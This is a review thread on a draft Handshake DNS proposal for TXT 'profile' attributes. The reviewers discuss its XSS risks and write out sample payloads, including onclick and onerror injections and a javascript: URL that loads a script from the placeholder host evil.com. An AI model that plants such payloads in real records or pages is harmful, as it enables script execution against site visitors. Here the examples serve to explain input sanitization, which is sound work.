HIP-xxx.md

```diff
@@ -0,0 +1,116 @@
+
+There are currently five supported attributes: **[email](#email)**, **[phone](#phone)**, **[avatar](#avatar)** and **[social](#social)**. All attributes are optional but at least one attribute needs to be present, for a Domain to count as a profile.
+
+### <a id="email"></a> (1) Profile Attribute: Email
+
+The email attribute is optional. It enables a domain owner to provide an email for the domain. The expected value is an email address.
+
+```
+TXT profile email=<email-address>
+```
+
+#### Valid Email Examples
+
+```
+TXT profile email=hello@niami.io
+TXT profile email=hello@niami
+```
+
+### <a id="phone"></a> (2) Profile Attribute: Phone
+
+The phone attribute is optional. It enables a domain owner to provide a phone number for the domain. The expected value is a phone number.
+
+Ideally the phone number is provided with a plus icon (+) and the country code.
+
+```
+TXT profile phone=<phone-number>
+```
+
+#### Valid Phone Examples
+
+```
+TXT profile phone=+1(536)8886253
+TXT profile phone=+15368886253
+TXT profile phone=+1536-888-6253
+TXT profile phone=1536-888-6253
+```
+
+### <a id="avatar"></a> (3) Profile Attribute: Avatar
+
+The avatar attribute is optional. It enables a domain owner to provide an avatar for the domain. The expected value is a fully qualified URL that must start with http:// or https:// that points to an image file.
+
+Allowed image formats are: APNG, AVIF, GIF, JPEG, PNG, SVG, WebP according to [Common image file types](https://developer.mozilla.org/en-US/docs/Web/Media/Formats/Image_types).
+
+```
+TXT profile avatar=<URL>
+```
+
+#### Valid Avatar Examples
+
+```
+TXT profile avatar=https://mywebsite.com/avatar.png
+TXT profile avatar=https://siasky.net/MABn4I5M6yPT0aCjIMU2OjlTWmKysaqoCeP0gSJw5moVrg
+```
+
+### <a id="social"></a> (4) Profile Attribute: Social
+
+The social attribute is optional. It enables a domain owner to provide social media usernames for the domain. The expected value is the name of the social platform followed by a username.
+
+The name of the social platform can be gathered by taking the hostname (e.g. www.twitter.com), then removing the www. and the TLD (.com). If the social platform is hosted on a handshake Domain, the handshake Domain is used as the name for the social platform.
+
+Site owners and apps using that data can decide which social platforms they want to support and how to display them.
+
+```
+TXT profile social=<social-media-name username>
+```
+
+#### Valid Social Username Examples
+
+```
+TXT profile social=twitter 0xstefan
+TXT profile social=github 0xstefan
+TXT profile social=discord 0xstefan#4697
+TXT profile social=hnschat 0xstefan
+```
+
+## Security Concerns
+
+There is a slight chance of Cross Site Scripting (XSS) when using URL's in attributes. Therefore a site owner should always verify the provided URL data before adding it to the DOM.
+
+### Example
+
+`<a href="javascript:alert('Hello World!');">Execute JavaScript</a>`
```

Comment:
wait what?

Reply:
record spec should also be written in my opinion

for example
`profile email=<a onclick="alert('XSS')">sus@email</a>`
or
`profile avatar=" onerror="alert('XSS')" z="`

Reply:
@pinheadmz 
Yes. Low risk but possible imo. Most modern frontend frameworks would mark such links as 'unsafe'.
The output would be:
```html
<a href="unsafe:javascript:alert('Hello World!');">Execute JavaScript</a>
```
No harm here. And it's really easy to test the input before rendering it in your html.
But if you do render it without any checks this can certainly happen.

@Noxturnix 
I don't think that's a big risk. The output would most likely be
```html
<a href="mailto:<a onclick="alert('XSS')">sus@email</a>">E-Mail Me!</a>
```
Which is invalid HTML and wouldn't do any harm

Reply:
AHA ok sorry I didn't realize what i was looking at I thought you were trying to insert a JS event into the HIP document itself 🤣  OK, can you elaborate on this example then? Actually display how it would look on chain in TXT and THEN what the consequence of not sterilizing input would be?

Relevant: https://davidgerard.co.uk/blockchain/2017/09/28/etherdelta-hack-malicious-javascript-in-a-contract-name-stealing-the-users-key/

Reply:
I'm not a hacker. 😆 So I don't have any deep experience with stuff like that. Also, with my current HIP proposal I think this is actually not a problem. Since I'm proposing to NOT add any fully qualified URLs to TXT records as links. Exactly because of that.

But if someone in the future would do

```
TXT profile website=<attribute value>
```

And the `<attribute value>` would be placed right into the href attribute of a link. Some bad actor could do

```
TXT profile website=javascript:var script=document.createElement('script');script.src='https://evil.com/javascript-file.js';document.body.appendChild(script);
```

The non-sterilized HTML would then look like 

```html
<a href="unsafe:javascript:var script=document.createElement('script');script.src='https://evil.com/javascript-file.js';document.body.appendChild(script);">Execute the evil JavaScript on click</a>
```

And by loading an external script into a website anything is possible. ;)